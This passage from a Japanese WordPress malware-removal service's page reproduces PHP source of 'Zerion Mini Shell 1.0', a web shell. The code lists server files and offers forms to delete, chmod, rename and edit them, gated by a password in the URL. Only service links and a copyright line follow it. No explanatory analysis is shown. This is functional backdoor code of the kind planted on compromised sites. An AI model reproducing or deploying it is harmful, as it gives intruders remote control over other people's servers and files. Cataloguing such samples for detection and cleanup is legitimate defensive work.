"</center></td>\r\n<td><center>"; if (is_writable("{$path}/{$file}")) { echo '<font color="green">'; } elseif (!is_readable("{$path}/{$file}")) { echo '<font color="red">'; } echo perms("{$path}/{$file}"); if (is_writable("{$path}/{$file}") || !is_readable("{$path}/{$file}")) { echo '</font>'; } echo "</center></td>\r\n<td><center><form method=\"POST\" action=\"?option&path={$path}&pass={$pass}\">\r\n<select name=\"opt\">\r\n<option value=\"\"></option>\r\n<option value=\"delete\">Delete</option>\r\n<option value=\"chmod\">Chmod</option>\r\n<option value=\"rename\">Rename</option>\r\n<option value=\"edit\">Edit</option>\r\n</select>\r\n\r\n<input type=\"hidden\" name=\"type\" value=\"file\">\r\n<input type=\"hidden\" name=\"name\" value=\"{$file}\">\r\n<input type=\"hidden\" name=\"path\" value=\"{$path}/{$file}\">\r\n<input type=\"hidden\" name=\"pass\" value=\"{$pass}\">\r\n<input type=\"submit\" value=\">\" />\r\n</form></center></td>\r\n</tr>"; } echo '</table> </div>'; } echo '<center><br />Zerion Mini Shell <font color="green">1.0</font></center> </BODY> </HTML>'; function perms($file) { $perms = fileperms($file); if (($perms & 0xc000) == 0xc000) { $info = 's'; } elseif (($perms & 0xa000) == 0xa000) { $info = 'l'; } elseif (($perms & 0x8000) == 0x8000) { $info = '-'; } elseif (($perms & 0x6000) == 0x6000) { $info = 'b'; } elseif (($perms & 0x4000) == 0x4000) { $info = 'd'; } elseif (($perms & 0x2000) == 0x2000) { $info = 'c'; } elseif (($perms & 0x1000) == 0x1000) { $info = 'p'; } else { $info = 'u'; } $info .= $perms & 0x100 ? 'r' : '-'; $info .= $perms & 0x80 ? 'w' : '-'; $info .= $perms & 0x40 ? $perms & 0x800 ? 's' : 'x' : ($perms & 0x800 ? 'S' : '-'); $info .= $perms & 0x20 ? 'r' : '-'; $info .= $perms & 0x10 ? 'w' : '-'; $info .= $perms & 0x8 ? $perms & 0x400 ? 's' : 'x' : ($perms & 0x400 ? 'S' : '-'); $info .= $perms & 0x4 ? 'r' : '-'; $info .= $perms & 0x2 ? 'w' : '-'; $info .= $perms & 0x1 ? $perms & 0x200 ? 't' : 'x' : ($perms & 0x200 ? 'T' : '-'); return $info; } };
■【無料】ワードプレス:マルウェアスキャン&セキュリティープラグイン [マルウェア・ウィルス検出と駆除]
■WordPress のマルウェア駆除、セキュリティー対策 カスタマイズや修正、引っ越し・復旧のご依頼承ります
(C)2019 ワードプレス ドクター All rights reserved.